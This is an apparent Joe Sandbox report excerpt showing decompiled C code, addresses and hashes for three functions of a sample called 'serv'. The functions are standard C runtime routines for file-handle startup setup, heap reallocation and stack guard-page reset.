                                                                    • Instruction ID: b2d51795aa5a4fea80f54206f756470e7129779bec07dd925f1cd34e768947a5
                                                                    • Opcode Fuzzy Hash: 2732343d804e41bff5c24e4326a6e69f578f08226c41092f09d17aa7e924ff49
                                                                    • Instruction Fuzzy Hash: 1351C230B086318BDB258F2AF8D472A77A1AB81758FA4812BD941C7391D779EC82C65C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 97%
                                                                    			E0042719C() {
                                                                    				void* __ebp;
                                                                    				signed int _t51;
                                                                    				signed int _t55;
                                                                    				long _t59;
                                                                    				signed int _t61;
                                                                    				signed int _t62;
                                                                    				signed int _t64;
                                                                    				signed int _t65;
                                                                    				void* _t69;
                                                                    				signed int* _t78;
                                                                    				signed int _t81;
                                                                    				signed int _t82;
                                                                    				signed int _t84;
                                                                    				signed int _t85;
                                                                    				signed int _t86;
                                                                    				signed char _t89;
                                                                    				signed int _t96;
                                                                    				void* _t99;
                                                                    				int _t101;
                                                                    				void** _t103;
                                                                    				void** _t105;
                                                                    				signed int** _t106;
                                                                    				intOrPtr* _t109;
                                                                    				void* _t110;
                                                                    
                                                                    				_t51 = E00422EEB(0x480);
                                                                    				if(_t51 != 0) {
                                                                    					 *0x44b140 = _t51;
                                                                    					 *0x44b120 = 0x20;
                                                                    					_t1 = _t51 + 0x480; // 0x480
                                                                    					_t84 = _t1;
                                                                    					while(1) {
                                                                    						__eflags = _t51 - _t84;
                                                                    						if(_t51 >= _t84) {
                                                                    							break;
                                                                    						}
                                                                    						 *_t51 =  *_t51 | 0xffffffff;
                                                                    						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
                                                                    						 *((char*)(_t51 + 4)) = 0;
                                                                    						 *((char*)(_t51 + 5)) = 0xa;
                                                                    						_t85 =  *0x44b140; // 0xa90640
                                                                    						_t51 = _t51 + 0x24;
                                                                    						_t84 = _t85 + 0x480;
                                                                    						__eflags = _t84;
                                                                    					}
                                                                    					GetStartupInfoA(_t110 + 0x14);
                                                                    					__eflags =  *((short*)(_t110 + 0x46));
                                                                    					if( *((short*)(_t110 + 0x46)) == 0) {
                                                                    						L26:
                                                                    						_t81 = 0;
                                                                    						__eflags = 0;
                                                                    						do {
                                                                    							_t86 =  *0x44b140; // 0xa90640
                                                                    							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
                                                                    							__eflags =  *_t103 - 0xffffffff;
                                                                    							if( *_t103 != 0xffffffff) {
                                                                    								_t49 =  &(_t103[1]);
                                                                    								 *_t49 = _t103[1] | 0x00000080;
                                                                    								__eflags =  *_t49;
                                                                    								goto L42;
                                                                    							}
                                                                    							__eflags = _t81;
                                                                    							_t103[1] = 0x81;
                                                                    							if(_t81 != 0) {
                                                                    								asm("sbb eax, eax");
                                                                    								_t59 =  ~(_t81 - 1) + 0xfffffff5;
                                                                    								__eflags = _t59;
                                                                    							} else {
                                                                    								_t59 = 0xfffffff6;
                                                                    							}
                                                                    							_t99 = GetStdHandle(_t59);
                                                                    							__eflags = _t99 - 0xffffffff;
                                                                    							if(_t99 == 0xffffffff) {
                                                                    								L40:
                                                                    								_t103[1] = _t103[1] | 0x00000040;
                                                                    							} else {
                                                                    								_t61 = GetFileType(_t99);
                                                                    								__eflags = _t61;
                                                                    								if(_t61 == 0) {
                                                                    									goto L40;
                                                                    								}
                                                                    								_t62 = _t61 & 0x000000ff;
                                                                    								__eflags = _t62 - 2;
                                                                    								 *_t103 = _t99;
                                                                    								if(__eflags != 0) {
                                                                    									__eflags = _t62 - 3;
                                                                    									if(__eflags == 0) {
                                                                    										_t42 =  &(_t103[1]);
                                                                    										 *_t42 = _t103[1] | 0x00000008;
                                                                    										__eflags =  *_t42;
                                                                    									}
                                                                    								} else {
                                                                    									_t103[1] = _t103[1] | 0x00000040;
                                                                    								}
                                                                    								_t44 =  &(_t103[3]); // 0xc
                                                                    								_push(0xfa0);
                                                                    								_t64 = E00427A37(__eflags);
                                                                    								__eflags = _t64;
                                                                    								if(_t64 == 0) {
                                                                    									L30:
                                                                    									_t55 = _t64 | 0xffffffff;
                                                                    									L44:
                                                                    									return _t55;
                                                                    								} else {
                                                                    									_t103[2] = _t103[2] + 1;
                                                                    									goto L42;
                                                                    								}
                                                                    							}
                                                                    							L42:
                                                                    							_t81 = _t81 + 1;
                                                                    							__eflags = _t81 - 3;
                                                                    						} while (_t81 < 3);
                                                                    						SetHandleCount( *0x44b120);
                                                                    						_t55 = 0;
                                                                    						__eflags = 0;
                                                                    						goto L44;
                                                                    					}
                                                                    					_t65 =  *(_t110 + 0x48);
                                                                    					__eflags = _t65;
                                                                    					if(_t65 == 0) {
                                                                    						goto L26;
                                                                    					}
                                                                    					_t101 =  *_t65;
                                                                    					_t109 = _t65 + 4;
                                                                    					 *(_t110 + 0x10) = _t101 + _t109;
                                                                    					__eflags = _t101 - 0x800;
                                                                    					if(_t101 >= 0x800) {
                                                                    						_t101 = 0x800;
                                                                    					}
                                                                    					__eflags =  *0x44b120 - _t101; // 0x20
                                                                    					if(__eflags >= 0) {
                                                                    						L18:
                                                                    						_t82 = 0;
                                                                    						__eflags = _t101;
                                                                    						if(_t101 <= 0) {
                                                                    							goto L26;
                                                                    						} else {
                                                                    							goto L19;
                                                                    						}
                                                                    						do {
                                                                    							L19:
                                                                    							_t69 =  *( *(_t110 + 0x10));
                                                                    							__eflags = _t69 - 0xffffffff;
                                                                    							if(_t69 == 0xffffffff) {
                                                                    								goto L25;
                                                                    							}
                                                                    							_t89 =  *_t109;
                                                                    							__eflags = _t89 & 0x00000001;
                                                                    							if((_t89 & 0x00000001) == 0) {
                                                                    								goto L25;
                                                                    							}
                                                                    							__eflags = _t89 & 0x00000008;
                                                                    							if(__eflags != 0) {
                                                                    								L23:
                                                                    								_t105 = 0x44b140[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
                                                                    								 *_t105 =  *( *(_t110 + 0x10));
                                                                    								_t105[1] =  *_t109;
                                                                    								_t30 =  &(_t105[3]); // 0xc
                                                                    								_push(0xfa0);
                                                                    								_t64 = E00427A37(__eflags);
                                                                    								__eflags = _t64;
                                                                    								if(_t64 == 0) {
                                                                    									goto L30;
                                                                    								}
                                                                    								_t31 =  &(_t105[2]);
                                                                    								 *_t31 = _t105[2] + 1;
                                                                    								__eflags =  *_t31;
                                                                    								goto L25;
                                                                    							}
                                                                    							__eflags = GetFileType(_t69);
                                                                    							if(__eflags == 0) {
                                                                    								goto L25;
                                                                    							}
                                                                    							goto L23;
                                                                    							L25:
                                                                    							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
                                                                    							_t82 = _t82 + 1;
                                                                    							_t109 = _t109 + 1;
                                                                    							__eflags = _t82 - _t101;
                                                                    						} while (_t82 < _t101);
                                                                    						goto L26;
                                                                    					} else {
                                                                    						_t106 = 0x44b144;
                                                                    						while(1) {
                                                                    							_t78 = E00422EEB(0x480);
                                                                    							__eflags = _t78;
                                                                    							if(_t78 == 0) {
                                                                    								break;
                                                                    							}
                                                                    							 *0x44b120 =  *0x44b120 + 0x20;
                                                                    							 *_t106 = _t78;
                                                                    							_t12 =  &(_t78[0x120]); // 0x480
                                                                    							_t96 = _t12;
                                                                    							while(1) {
                                                                    								__eflags = _t78 - _t96;
                                                                    								if(_t78 >= _t96) {
                                                                    									break;
                                                                    								}
                                                                    								 *_t78 =  *_t78 | 0xffffffff;
                                                                    								_t78[2] = _t78[2] & 0x00000000;
                                                                    								_t78[1] = 0;
                                                                    								_t78[1] = 0xa;
                                                                    								_t78 =  &(_t78[9]);
                                                                    								_t96 =  &(( *_t106)[0x120]);
                                                                    								__eflags = _t96;
                                                                    							}
                                                                    							_t106 =  &(_t106[1]);
                                                                    							__eflags =  *0x44b120 - _t101; // 0x20
                                                                    							if(__eflags < 0) {
                                                                    								continue;
                                                                    							}
                                                                    							goto L18;
                                                                    						}
                                                                    						_t101 =  *0x44b120; // 0x20
                                                                    						goto L18;
                                                                    					}
                                                                    				}
                                                                    				return _t51 | 0xffffffff;
                                                                    			}



























                                                                    0x004271a6
                                                                    0x004271ae
                                                                    0x004271b8
                                                                    0x004271bd
                                                                    0x004271c7
                                                                    0x004271c7
                                                                    0x004271ed
                                                                    0x004271ed
                                                                    0x004271ef
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004271cf
                                                                    0x004271d2
                                                                    0x004271d6
                                                                    0x004271da
                                                                    0x004271de
                                                                    0x004271e4
                                                                    0x004271e7
                                                                    0x004271e7
                                                                    0x004271e7
                                                                    0x004271f9
                                                                    0x004271ff
                                                                    0x00427205
                                                                    0x004272f4
                                                                    0x004272f4
                                                                    0x004272f4
                                                                    0x004272f6
                                                                    0x004272f6
                                                                    0x004272ff
                                                                    0x00427302
                                                                    0x00427305
                                                                    0x00427376
                                                                    0x00427376
                                                                    0x00427376
                                                                    0x00000000
                                                                    0x00427376
                                                                    0x00427307
                                                                    0x00427309
                                                                    0x0042730d
                                                                    0x0042731e
                                                                    0x00427320
                                                                    0x00427320
                                                                    0x0042730f
                                                                    0x00427311
                                                                    0x00427311
                                                                    0x0042732a
                                                                    0x0042732c
                                                                    0x0042732f
                                                                    0x00427370
                                                                    0x00427370
                                                                    0x00427331
                                                                    0x00427332
                                                                    0x00427338
                                                                    0x0042733a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042733c
                                                                    0x00427341
                                                                    0x00427344
                                                                    0x00427346
                                                                    0x0042734e
                                                                    0x00427351
                                                                    0x00427353
                                                                    0x00427353
                                                                    0x00427353
                                                                    0x00427353
                                                                    0x00427348
                                                                    0x00427348
                                                                    0x00427348
                                                                    0x00427357
                                                                    0x0042735a
                                                                    0x00427360
                                                                    0x00427365
                                                                    0x00427369
                                                                    0x00427314
                                                                    0x00427314
                                                                    0x00427392
                                                                    0x00000000
                                                                    0x0042736b
                                                                    0x0042736b
                                                                    0x00000000
                                                                    0x0042736b
                                                                    0x00427369
                                                                    0x0042737a
                                                                    0x0042737a
                                                                    0x0042737b
                                                                    0x0042737b
                                                                    0x0042738a
                                                                    0x00427390
                                                                    0x00427390
                                                                    0x00000000
                                                                    0x00427390
                                                                    0x0042720b
                                                                    0x0042720f
                                                                    0x00427211
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427217
                                                                    0x00427219
                                                                    0x0042721f
                                                                    0x00427228
                                                                    0x0042722a
                                                                    0x0042722c
                                                                    0x0042722c
                                                                    0x0042722e
                                                                    0x00427234
                                                                    0x00427284
                                                                    0x00427284
                                                                    0x00427286
                                                                    0x00427288
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042728a
                                                                    0x0042728a
                                                                    0x0042728e
                                                                    0x00427290
                                                                    0x00427293
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427295
                                                                    0x00427298
                                                                    0x0042729b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042729d
                                                                    0x004272a0
                                                                    0x004272ad
                                                                    0x004272c1
                                                                    0x004272ca
                                                                    0x004272cf
                                                                    0x004272d2
                                                                    0x004272d5
                                                                    0x004272db
                                                                    0x004272e0
                                                                    0x004272e4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004272e6
                                                                    0x004272e6
                                                                    0x004272e6
                                                                    0x00000000
                                                                    0x004272e6
                                                                    0x004272a9
                                                                    0x004272ab
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004272e9
                                                                    0x004272e9
                                                                    0x004272ee
                                                                    0x004272ef
                                                                    0x004272f0
                                                                    0x004272f0
                                                                    0x00000000
                                                                    0x00427236
                                                                    0x00427236
                                                                    0x0042723b
                                                                    0x0042723c
                                                                    0x00427241
                                                                    0x00427244
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427246
                                                                    0x0042724d
                                                                    0x0042724f
                                                                    0x0042724f
                                                                    0x0042726d
                                                                    0x0042726d
                                                                    0x0042726f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427257
                                                                    0x0042725a
                                                                    0x0042725e
                                                                    0x00427262
                                                                    0x00427268
                                                                    0x0042726b
                                                                    0x0042726b
                                                                    0x0042726b
                                                                    0x00427271
                                                                    0x00427274
                                                                    0x0042727a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042727c
                                                                    0x0042727e
                                                                    0x00000000
                                                                    0x0042727e
                                                                    0x00427234
                                                                    0x00000000

                                                                    APIs
                                                                    • GetStartupInfoA.KERNEL32(?), ref: 004271F9
                                                                    • GetFileType.KERNEL32(?), ref: 004272A3
                                                                    • GetStdHandle.KERNEL32(-000000F6), ref: 00427324
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleInfoStartupType
                                                                    • String ID:
                                                                    • API String ID: 2461013171-0
                                                                    • Opcode ID: a6857e4607a195e0e5682d2243a2fadf662c40425cd609d80db00953e4e459e1
                                                                    • Instruction ID: a6a67d0374b2e9e0c6ded3a7aed6c943089740e477cfed26efa39e09722bcd27
                                                                    • Opcode Fuzzy Hash: a6857e4607a195e0e5682d2243a2fadf662c40425cd609d80db00953e4e459e1
                                                                    • Instruction Fuzzy Hash: 4B51D3313083528FC724CF69E89872677E4FB01324F684AAEE9A6C72E1D738D405D759
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 54%
                                                                    			E004251E9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				long _t30;
                                                                    				long _t31;
                                                                    				long _t33;
                                                                    				void* _t36;
                                                                    				long _t38;
                                                                    				long _t41;
                                                                    				long _t42;
                                                                    				long _t44;
                                                                    				long _t46;
                                                                    				void* _t59;
                                                                    				long _t61;
                                                                    				void* _t67;
                                                                    				void* _t68;
                                                                    
                                                                    				_push(0x14);
                                                                    				_push(0x430630);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				_t59 =  *(_t67 + 8);
                                                                    				if(_t59 != 0) {
                                                                    					_t61 =  *(_t67 + 0xc);
                                                                    					__eflags = _t61;
                                                                    					if(__eflags != 0) {
                                                                    						__eflags =  *0x44c298 - 3;
                                                                    						if( *0x44c298 != 3) {
                                                                    							while(1) {
                                                                    								_t28 = 0;
                                                                    								__eflags = _t61 - 0xffffffe0;
                                                                    								if(_t61 <= 0xffffffe0) {
                                                                    									__eflags = _t61;
                                                                    									if(_t61 == 0) {
                                                                    										_t61 = 1;
                                                                    										__eflags = 1;
                                                                    									}
                                                                    									_t28 = RtlReAllocateHeap( *0x44c294, 0, _t59, _t61);
                                                                    								}
                                                                    								__eflags = _t28;
                                                                    								if(_t28 != 0) {
                                                                    									goto L37;
                                                                    								}
                                                                    								__eflags =  *0x4483cc; // 0x0
                                                                    								if(__eflags == 0) {
                                                                    									goto L37;
                                                                    								}
                                                                    								_t30 = E00422EFD(_t61);
                                                                    								__eflags = _t30;
                                                                    								if(_t30 != 0) {
                                                                    									continue;
                                                                    								}
                                                                    								goto L36;
                                                                    							}
                                                                    							goto L37;
                                                                    						} else {
                                                                    							goto L5;
                                                                    						}
                                                                    						do {
                                                                    							L5:
                                                                    							 *(_t67 - 0x1c) = 0;
                                                                    							__eflags = _t61 - 0xffffffe0;
                                                                    							if(_t61 > 0xffffffe0) {
                                                                    								L25:
                                                                    								_t28 =  *(_t67 - 0x1c);
                                                                    								__eflags =  *(_t67 - 0x1c);
                                                                    								if( *(_t67 - 0x1c) != 0) {
                                                                    									goto L37;
                                                                    								}
                                                                    								__eflags =  *0x4483cc; // 0x0
                                                                    								if(__eflags == 0) {
                                                                    									goto L37;
                                                                    								}
                                                                    								goto L27;
                                                                    							}
                                                                    							E004241FB(0, _t59, 4);
                                                                    							 *(_t67 - 4) = 0;
                                                                    							_t33 = E0042470E(_t59);
                                                                    							 *(_t67 - 0x20) = _t33;
                                                                    							__eflags = _t33;
                                                                    							if(_t33 == 0) {
                                                                    								L21:
                                                                    								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
                                                                    								E00425351();
                                                                    								__eflags =  *(_t67 - 0x20);
                                                                    								if( *(_t67 - 0x20) == 0) {
                                                                    									__eflags = _t61;
                                                                    									if(_t61 == 0) {
                                                                    										_t61 = 1;
                                                                    										__eflags = 1;
                                                                    									}
                                                                    									_t61 = _t61 + 0x0000000f & 0xfffffff0;
                                                                    									__eflags = _t61;
                                                                    									 *(_t67 + 0xc) = _t61;
                                                                    									 *(_t67 - 0x1c) = RtlReAllocateHeap( *0x44c294, 0, _t59, _t61);
                                                                    								}
                                                                    								goto L25;
                                                                    							}
                                                                    							__eflags = _t61 -  *0x44c284;
                                                                    							if(_t61 <=  *0x44c284) {
                                                                    								_push(_t61);
                                                                    								_push(_t59);
                                                                    								_push(_t33);
                                                                    								_t41 = E00424C0E();
                                                                    								_t68 = _t68 + 0xc;
                                                                    								__eflags = _t41;
                                                                    								if(_t41 == 0) {
                                                                    									_push(_t61);
                                                                    									_t42 = E00424EED();
                                                                    									 *(_t67 - 0x1c) = _t42;
                                                                    									__eflags = _t42;
                                                                    									if(_t42 != 0) {
                                                                    										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
                                                                    										 *(_t67 - 0x24) = _t44;
                                                                    										__eflags = _t44 - _t61;
                                                                    										if(_t44 >= _t61) {
                                                                    											_t44 = _t61;
                                                                    										}
                                                                    										E00422FB0( *(_t67 - 0x1c), _t59, _t44);
                                                                    										_t46 = E0042470E(_t59);
                                                                    										 *(_t67 - 0x20) = _t46;
                                                                    										_push(_t59);
                                                                    										_push(_t46);
                                                                    										E00424739();
                                                                    										_t68 = _t68 + 0x18;
                                                                    									}
                                                                    								} else {
                                                                    									 *(_t67 - 0x1c) = _t59;
                                                                    								}
                                                                    							}
                                                                    							__eflags =  *(_t67 - 0x1c);
                                                                    							if( *(_t67 - 0x1c) == 0) {
                                                                    								__eflags = _t61;
                                                                    								if(_t61 == 0) {
                                                                    									_t61 = 1;
                                                                    									__eflags = 1;
                                                                    									 *(_t67 + 0xc) = 1;
                                                                    								}
                                                                    								_t61 = _t61 + 0x0000000f & 0xfffffff0;
                                                                    								 *(_t67 + 0xc) = _t61;
                                                                    								_t36 = RtlAllocateHeap( *0x44c294, 0, _t61);
                                                                    								 *(_t67 - 0x1c) = _t36;
                                                                    								__eflags = _t36;
                                                                    								if(_t36 != 0) {
                                                                    									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
                                                                    									 *(_t67 - 0x24) = _t38;
                                                                    									__eflags = _t38 - _t61;
                                                                    									if(_t38 >= _t61) {
                                                                    										_t38 = _t61;
                                                                    									}
                                                                    									E00422FB0( *(_t67 - 0x1c), _t59, _t38);
                                                                    									_push(_t59);
                                                                    									_push( *(_t67 - 0x20));
                                                                    									E00424739();
                                                                    									_t68 = _t68 + 0x14;
                                                                    								}
                                                                    							}
                                                                    							goto L21;
                                                                    							L27:
                                                                    							_t31 = E00422EFD(_t61);
                                                                    							__eflags = _t31;
                                                                    						} while (_t31 != 0);
                                                                    						goto L36;
                                                                    					} else {
                                                                    						_push(_t59);
                                                                    						E0042275E(0, _t59, _t61, __eflags);
                                                                    						L36:
                                                                    						_t28 = 0;
                                                                    						__eflags = 0;
                                                                    						goto L37;
                                                                    					}
                                                                    				} else {
                                                                    					_t28 = E00422EEB( *(_t67 + 0xc));
                                                                    					L37:
                                                                    					return E00424267(_t28);
                                                                    				}
                                                                    			}
















                                                                    0x004251e9
                                                                    0x004251eb
                                                                    0x004251f0
                                                                    0x004251f5
                                                                    0x004251fc
                                                                    0x0042520c
                                                                    0x0042520f
                                                                    0x00425211
                                                                    0x0042521f
                                                                    0x00425226
                                                                    0x0042535a
                                                                    0x0042535a
                                                                    0x0042535c
                                                                    0x0042535f
                                                                    0x00425361
                                                                    0x00425363
                                                                    0x00425367
                                                                    0x00425367
                                                                    0x00425367
                                                                    0x00425371
                                                                    0x00425371
                                                                    0x00425377
                                                                    0x00425379
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042537b
                                                                    0x00425381
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00425384
                                                                    0x0042538a
                                                                    0x0042538c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042538c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042522c
                                                                    0x0042522c
                                                                    0x0042522c
                                                                    0x0042522f
                                                                    0x00425232
                                                                    0x00425329
                                                                    0x00425329
                                                                    0x0042532c
                                                                    0x0042532e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00425330
                                                                    0x00425336
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00425336
                                                                    0x0042523a
                                                                    0x00425240
                                                                    0x00425244
                                                                    0x0042524a
                                                                    0x0042524d
                                                                    0x0042524f
                                                                    0x004252f9
                                                                    0x004252f9
                                                                    0x004252fd
                                                                    0x00425302
                                                                    0x00425305
                                                                    0x00425307
                                                                    0x00425309
                                                                    0x0042530d
                                                                    0x0042530d
                                                                    0x0042530d
                                                                    0x00425311
                                                                    0x00425311
                                                                    0x00425314
                                                                    0x00425326
                                                                    0x00425326
                                                                    0x00000000
                                                                    0x00425305
                                                                    0x00425255
                                                                    0x0042525b
                                                                    0x0042525d
                                                                    0x0042525e
                                                                    0x0042525f
                                                                    0x00425260
                                                                    0x00425265
                                                                    0x00425268
                                                                    0x0042526a
                                                                    0x00425271
                                                                    0x00425272
                                                                    0x00425278
                                                                    0x0042527b
                                                                    0x0042527d
                                                                    0x00425282
                                                                    0x00425283
                                                                    0x00425286
                                                                    0x00425288
                                                                    0x0042528a
                                                                    0x0042528a
                                                                    0x00425291
                                                                    0x00425297
                                                                    0x0042529c
                                                                    0x0042529f
                                                                    0x004252a0
                                                                    0x004252a1
                                                                    0x004252a6
                                                                    0x004252a6
                                                                    0x0042526c
                                                                    0x0042526c
                                                                    0x0042526c
                                                                    0x0042526a
                                                                    0x004252a9
                                                                    0x004252ac
                                                                    0x004252ae
                                                                    0x004252b0
                                                                    0x004252b4
                                                                    0x004252b4
                                                                    0x004252b5
                                                                    0x004252b5
                                                                    0x004252bb
                                                                    0x004252be
                                                                    0x004252c9
                                                                    0x004252cf
                                                                    0x004252d2
                                                                    0x004252d4
                                                                    0x004252d9
                                                                    0x004252da
                                                                    0x004252dd
                                                                    0x004252df
                                                                    0x004252e1
                                                                    0x004252e1
                                                                    0x004252e8
                                                                    0x004252ed
                                                                    0x004252ee
                                                                    0x004252f1
                                                                    0x004252f6
                                                                    0x004252f6
                                                                    0x004252d4
                                                                    0x00000000
                                                                    0x00425338
                                                                    0x00425339
                                                                    0x0042533f
                                                                    0x0042533f
                                                                    0x00000000
                                                                    0x00425213
                                                                    0x00425213
                                                                    0x00425214
                                                                    0x0042538e
                                                                    0x0042538e
                                                                    0x0042538e
                                                                    0x00000000
                                                                    0x0042538e
                                                                    0x004251fe
                                                                    0x00425201
                                                                    0x00425390
                                                                    0x00425395
                                                                    0x00425395

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ff85992b265810fd6ebf1bfbea3a73c4d786de36042eee2b59c19c44a7b44baf
                                                                    • Instruction ID: 50c6e6ca1a471ced26daec9c1ca993849403effbbc4278b2e0fe4d56d80a6d58
                                                                    • Opcode Fuzzy Hash: ff85992b265810fd6ebf1bfbea3a73c4d786de36042eee2b59c19c44a7b44baf
                                                                    • Instruction Fuzzy Hash: A541C5B1F01935EBCF20AFA6BC848AF7A64EA45764791112FFC14A6290D77C4D41CEAC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E00429AAE(void* __ecx, void* __eflags) {
                                                                    				void* _v8;
                                                                    				long _v12;
                                                                    				long _v16;
                                                                    				signed char _v23;
                                                                    				struct _MEMORY_BASIC_INFORMATION _v44;
                                                                    				struct _SYSTEM_INFO _v80;
                                                                    				void* _v92;
                                                                    				void* _t29;
                                                                    				int _t33;
                                                                    				intOrPtr _t35;
                                                                    				void* _t43;
                                                                    				void* _t46;
                                                                    				signed int _t49;
                                                                    				void* _t54;
                                                                    				void* _t55;
                                                                    				void* _t62;
                                                                    				void* _t63;
                                                                    
                                                                    				_t29 = 4;
                                                                    				E00422920(_t29, __ecx);
                                                                    				_t55 = _t63;
                                                                    				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
                                                                    					L9:
                                                                    					_t33 = 0;
                                                                    				} else {
                                                                    					_t46 = _v44.AllocationBase;
                                                                    					GetSystemInfo( &_v80);
                                                                    					_t49 = _v80.dwPageSize;
                                                                    					_t35 =  *0x448268; // 0x2
                                                                    					_t54 = ( !(_t49 - 1) & _t55) - _t49;
                                                                    					asm("sbb esi, esi");
                                                                    					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
                                                                    					_v12 = _t49;
                                                                    					if(_t54 < _t62) {
                                                                    						goto L9;
                                                                    					} else {
                                                                    						if(_t35 == 1) {
                                                                    							_v8 = _t54;
                                                                    							goto L14;
                                                                    						} else {
                                                                    							_v8 = _t46;
                                                                    							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
                                                                    								_v8 = _v8 + _v44.RegionSize;
                                                                    								if((_v44.State & 0x00001000) == 0) {
                                                                    									continue;
                                                                    								} else {
                                                                    									_t43 = _v44.BaseAddress;
                                                                    									_v8 = _t43;
                                                                    									if((_v23 & 0x00000001) == 0) {
                                                                    										if(_t54 >= _t43) {
                                                                    											if(_t43 < _t62) {
                                                                    												_v8 = _t62;
                                                                    											}
                                                                    											VirtualAlloc(_v8, _v12, 0x1000, 4);
                                                                    											_t35 =  *0x448268; // 0x2
                                                                    											L14:
                                                                    											asm("sbb eax, eax");
                                                                    											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
                                                                    										} else {
                                                                    											goto L9;
                                                                    										}
                                                                    									} else {
                                                                    										_t33 = 1;
                                                                    									}
                                                                    								}
                                                                    								goto L15;
                                                                    							}
                                                                    							goto L9;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				L15:
                                                                    				return _t33;
                                                                    			}




















                                                                    0x00429ab9
                                                                    0x00429aba
                                                                    0x00429abf
                                                                    0x00429ad0
                                                                    0x00429b49
                                                                    0x00429b49
                                                                    0x00429ad2
                                                                    0x00429ad2
                                                                    0x00429ad9
                                                                    0x00429adf
                                                                    0x00429ae2
                                                                    0x00429aee
                                                                    0x00429af5
                                                                    0x00429b00
                                                                    0x00429b04
                                                                    0x00429b07
                                                                    0x00000000
                                                                    0x00429b09
                                                                    0x00429b0c
                                                                    0x00429b6a
                                                                    0x00000000
                                                                    0x00429b0e
                                                                    0x00429b0e
                                                                    0x00429b16
                                                                    0x00429b2c
                                                                    0x00429b32
                                                                    0x00000000
                                                                    0x00429b34
                                                                    0x00429b38
                                                                    0x00429b3b
                                                                    0x00429b3e
                                                                    0x00429b47
                                                                    0x00429b4f
                                                                    0x00429b51
                                                                    0x00429b51
                                                                    0x00429b5d
                                                                    0x00429b63
                                                                    0x00429b6d
                                                                    0x00429b70
                                                                    0x00429b83
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00429b40
                                                                    0x00429b42
                                                                    0x00429b42
                                                                    0x00429b3e
                                                                    0x00000000
                                                                    0x00429b32
                                                                    0x00000000
                                                                    0x00429b16
                                                                    0x00429b0c
                                                                    0x00429b07
                                                                    0x00429b89
                                                                    0x00429b90

                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00429AC8
